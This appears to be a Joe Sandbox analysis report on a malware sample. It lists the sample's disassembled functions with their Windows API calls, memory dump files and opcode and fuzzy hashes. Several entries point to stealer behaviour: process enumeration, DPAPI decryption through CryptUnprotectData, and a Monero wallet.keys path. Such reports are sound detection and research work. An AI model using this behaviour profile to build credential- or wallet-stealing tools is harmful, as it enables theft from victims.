                              • Associated: 00000001.00000002.1354117623.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364127921.0000000000F4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364739383.00000000010F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364894008.00000000010F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                              • String ID: \*.*
                              • API String ID: 433455689-1173974218
                              • Opcode ID: 46bdf50ab7c18b30b35b076719582bead56780d9bee5e1f803f59544e1a20900
                              • Instruction ID: 44936d24f94b4dd564f512784812747ab8c4c5fd566a21fdbcf089bc37248029
                              • Opcode Fuzzy Hash: 46bdf50ab7c18b30b35b076719582bead56780d9bee5e1f803f59544e1a20900
                              • Instruction Fuzzy Hash: 19122572A101189ADB18FB70DE96EEE7378AF64300F404599B51AB7091EF346F49CF92
                              Function 00E22699 Relevance: 9.1, Strings: 6, Instructions: 1628COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1354117623.0000000000CAE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              • Associated: 00000001.00000002.1353028407.0000000000A50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000C9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F10000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364127921.0000000000F4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364739383.00000000010F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364894008.00000000010F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: $q;c$B~[$uI<u${lgw$68>$}m
                              • API String ID: 0-578503082
                              • Opcode ID: 36c1338a8b17650ce7466a67a24eccac62e36711c0ac8e636be97eeb3989790c
                              • Instruction ID: 79f86aa7a8dba1d952a1910180b00bce703af730a9821c370f5e2418bae03b8d
                              • Opcode Fuzzy Hash: 36c1338a8b17650ce7466a67a24eccac62e36711c0ac8e636be97eeb3989790c
                              • Instruction Fuzzy Hash: 21B218F3A082009FE304AE2DDC8567AFBE9EF94720F16463DEAC5D3744EA3558018697
                              Function 00E18575 Relevance: 9.1, Strings: 6, Instructions: 1627COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1354117623.0000000000CAE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              • Associated: 00000001.00000002.1353028407.0000000000A50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000C9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F10000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364127921.0000000000F4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364739383.00000000010F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364894008.00000000010F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: @%~#$Wr~$Zao$^<^$bbo_$Pwm
                              • API String ID: 0-3198876897
                              • Opcode ID: 4ec7c66a33b361faa1a872591eb654c8e723258bf935e8e317187c669c53d0b7
                              • Instruction ID: f211468456fb67b0662b093ca110c225abcddaa2d408974bc62327dbd35f3995
                              • Opcode Fuzzy Hash: 4ec7c66a33b361faa1a872591eb654c8e723258bf935e8e317187c669c53d0b7
                              • Instruction Fuzzy Hash: 5EB208F360C204AFE7046E2DEC8567ABBE5EF94720F1A893DE6C4C3744E63598058697
                              Function 00E16B3E Relevance: 9.1, Strings: 6, Instructions: 1593COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1354117623.0000000000CAE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              • Associated: 00000001.00000002.1353028407.0000000000A50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000C9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F10000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364127921.0000000000F4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364739383.00000000010F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364894008.00000000010F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: #us$?u#p$Pg$bKK$DZ$_~
                              • API String ID: 0-1675584353
                              • Opcode ID: d735c56dc20da3782bafb7d682e3f34c0a78d02609210437684b4be94817e43a
                              • Instruction ID: 61f102032884b46e3fab5b53738f3b31a959a8eb44b5e541b9fa30f44d625032
                              • Opcode Fuzzy Hash: d735c56dc20da3782bafb7d682e3f34c0a78d02609210437684b4be94817e43a
                              • Instruction Fuzzy Hash: 73B2F9F390C204AFE3046E29EC8567AFBE9EF94720F1A4A3DE6C4C3744E63558458697
                              Function 00A5C820 Relevance: 7.6, APIs: 5, Instructions: 95stringencryptionCOMMON
                              Download Yara Rule
                              APIs
                              • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00A5C871
                              • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00A5C87C
                              • lstrcat.KERNEL32(?,00A70B46), ref: 00A5C943
                              • lstrcat.KERNEL32(?,00A70B47), ref: 00A5C957
                              • lstrcat.KERNEL32(?,00A70B4E), ref: 00A5C978
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              • Associated: 00000001.00000002.1353028407.0000000000A50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000C9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000CAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F10000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364127921.0000000000F4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364739383.00000000010F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364894008.00000000010F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$BinaryCryptStringlstrlen
                              • String ID:
                              • API String ID: 189259977-0
                              • Opcode ID: b1dc5cc2d6b69406d4340d1aec32488eb7444be103dcd9e95c8e647887dd39b7
                              • Instruction ID: a582be708bf770b65d037e47de9e595be6ecc6eefd0b88ae765634868aad67f6
                              • Opcode Fuzzy Hash: b1dc5cc2d6b69406d4340d1aec32488eb7444be103dcd9e95c8e647887dd39b7
                              • Instruction Fuzzy Hash: 8B413BB590421AEFCB10DFA4DD89BEEB7B8BB88704F1045A9F509A7280D7745B84CF91
                              Function 00A57240 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000008,00000400), ref: 00A5724D
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00A57254
                              • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00A57281
                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 00A572A4
                              • LocalFree.KERNEL32(?), ref: 00A572AE
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              • Associated: 00000001.00000002.1353028407.0000000000A50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000C9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000CAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F10000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364127921.0000000000F4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364739383.00000000010F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364894008.00000000010F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                              • String ID:
                              • API String ID: 2609814428-0
                              • Opcode ID: 9e564869b81cc02a88719da953cd93cabbfa2ed5f99ae5dfa8349212badb5974
                              • Instruction ID: 6eaa4bbf014fad3cf82b965e9c6a9cb7cceba81671c28052dcf85410e9da719d
                              • Opcode Fuzzy Hash: 9e564869b81cc02a88719da953cd93cabbfa2ed5f99ae5dfa8349212badb5974
                              • Instruction Fuzzy Hash: D4011275A40208BBDB10DFD4DD4AF9E7778FB44705F108155FB05BB2C0D670AA008BA9
                              Function 00A69600 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON
                              Download Yara Rule
                              APIs
                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00A6961E
                              • Process32First.KERNEL32(00A70ACA,00000128), ref: 00A69632
                              • Process32Next.KERNEL32(00A70ACA,00000128), ref: 00A69647
                              • StrCmpCA.SHLWAPI(?,00000000), ref: 00A6965C
                              • CloseHandle.KERNEL32(00A70ACA), ref: 00A6967A
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              • Associated: 00000001.00000002.1353028407.0000000000A50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000C9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000CAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F10000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364127921.0000000000F4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364739383.00000000010F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364894008.00000000010F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                              • String ID:
                              • API String ID: 420147892-0
                              • Opcode ID: 6e76dcdb02bd9f333bc1ac87e59352541d9e1d67e26c14bb5950fbad2d205c47
                              • Instruction ID: 6984363cb495da08e42685d9118ea951591a60251380957be6ffc216041eabde
                              • Opcode Fuzzy Hash: 6e76dcdb02bd9f333bc1ac87e59352541d9e1d67e26c14bb5950fbad2d205c47
                              • Instruction Fuzzy Hash: 28011E79A00308EBCB15DFA5CD48BEEB7FDEB48300F104189A90697280DB749B40CF91
                              Function 00A68680 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00A6A740: lstrcpy.KERNEL32(00A70E17,00000000), ref: 00A6A788
                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00A705B7), ref: 00A686CA
                              • Process32First.KERNEL32(?,00000128), ref: 00A686DE
                              • Process32Next.KERNEL32(?,00000128), ref: 00A686F3
                                • Part of subcall function 00A6A9B0: lstrlen.KERNEL32(?,014488B8,?,\Monero\wallet.keys,00A70E17), ref: 00A6A9C5
                                • Part of subcall function 00A6A9B0: lstrcpy.KERNEL32(00000000), ref: 00A6AA04
                                • Part of subcall function 00A6A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00A6AA12
                                • Part of subcall function 00A6A8A0: lstrcpy.KERNEL32(?,00A70E17), ref: 00A6A905
                              • CloseHandle.KERNEL32(?), ref: 00A68761
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              • Associated: 00000001.00000002.1353028407.0000000000A50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000C9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000CAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F10000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364127921.0000000000F4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364739383.00000000010F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364894008.00000000010F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                              • String ID:
                              • API String ID: 1066202413-0
                              • Opcode ID: 5ce326b6f6527cc8d3571cffb03a437326c9e8e0e24e350d695a23a6a75d99b5
                              • Instruction ID: d822600af2fc09ef6b5c65a7593ba36692f0ee39b99e3dd7d48747411e7abef3
                              • Opcode Fuzzy Hash: 5ce326b6f6527cc8d3571cffb03a437326c9e8e0e24e350d695a23a6a75d99b5
                              • Instruction Fuzzy Hash: 3C313972901218ABCB24DF95CD45FEEB778EF55700F108699B50AB21A0DF346A45CFA2
                              Function 00A68EA0 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON
                              Download Yara Rule
                              APIs
                              • CryptBinaryToStringA.CRYPT32(00000000,00A55184,40000001,00000000,00000000,?,00A55184), ref: 00A68EC0
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              • Associated: 00000001.00000002.1353028407.0000000000A50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000C9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000CAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F10000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364127921.0000000000F4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364739383.00000000010F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364894008.00000000010F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: BinaryCryptString
                              • String ID:
                              • API String ID: 80407269-0
                              • Opcode ID: 68bba701e41466c395e15b5d2a13db00645219afb429ba166d2c20c3d4d3861d
                              • Instruction ID: 2ec3c7267a61558b4d46c4d5d431f1fc2bb9212d6ffd57616226cc5b62d6be09
                              • Opcode Fuzzy Hash: 68bba701e41466c395e15b5d2a13db00645219afb429ba166d2c20c3d4d3861d
                              • Instruction Fuzzy Hash: CD11E874200209BFDB00CFA4D899FAB37BDAF89714F109658F9198B250DB79ED41DB64
                              Function 00A59AC0 Relevance: 6.1, APIs: 4, Instructions: 55encryptionmemoryCOMMON
                              Download Yara Rule
                              APIs
                              • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00A54EEE,00000000,00000000), ref: 00A59AEF
                              • LocalAlloc.KERNEL32(00000040,?,?,?,00A54EEE,00000000,?), ref: 00A59B01
                              • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00A54EEE,00000000,00000000), ref: 00A59B2A
                              • LocalFree.KERNEL32(?,?,?,?,00A54EEE,00000000,?), ref: 00A59B3F
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              • Associated: 00000001.00000002.1353028407.0000000000A50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000C9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000CAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F10000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364127921.0000000000F4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364739383.00000000010F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364894008.00000000010F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: BinaryCryptLocalString$AllocFree
                              • String ID:
                              • API String ID: 4291131564-0
                              • Opcode ID: 1346a80cebea2282ca0f031e694034574d4a6fb2e53eba76bfa2ecf77ce966a8
                              • Instruction ID: 819f5690017e1d8690211eb604dec7c04afe8e1b66ca59729ebdb88df1fd5698
                              • Opcode Fuzzy Hash: 1346a80cebea2282ca0f031e694034574d4a6fb2e53eba76bfa2ecf77ce966a8
                              • Instruction Fuzzy Hash: B2119FB4240208EFEB10CF64D899FAA77A5FB89701F208059FD199F290C6B6A901CB94
                              Function 00A67980 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00A70E00,00000000,?), ref: 00A679B0
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00A679B7
                              • GetLocalTime.KERNEL32(?,?,?,?,?,00A70E00,00000000,?), ref: 00A679C4
                              • wsprintfA.USER32 ref: 00A679F3
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              • Associated: 00000001.00000002.1353028407.0000000000A50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000C9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000CAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F10000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364127921.0000000000F4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364739383.00000000010F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364894008.00000000010F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateLocalProcessTimewsprintf
                              • String ID:
                              • API String ID: 377395780-0
                              • Opcode ID: 69d21e1dd80024d8562bf01790fba5dd9b8682edb25288e7129e08a81ba1fc95
                              • Instruction ID: db865b56c88a4d7d0ac18ac83b82c2d10db43910f0940cd7942b28f74ebbc109
                              • Opcode Fuzzy Hash: 69d21e1dd80024d8562bf01790fba5dd9b8682edb25288e7129e08a81ba1fc95
                              • Instruction Fuzzy Hash: 691139B2904118ABCB14DFCADD49BBEB7F8FB4CB11F10425AF605A2280E7395940CBB5
                              Function 00A67A30 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0144EC28,00000000,?,00A70E10,00000000,?,00000000,00000000), ref: 00A67A63
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00A67A6A
                              • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0144EC28,00000000,?,00A70E10,00000000,?,00000000,00000000,?), ref: 00A67A7D
                              • wsprintfA.USER32 ref: 00A67AB7
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              • Associated: 00000001.00000002.1353028407.0000000000A50000.00000004.00000001.01000000.00000003.sdmpDownload File
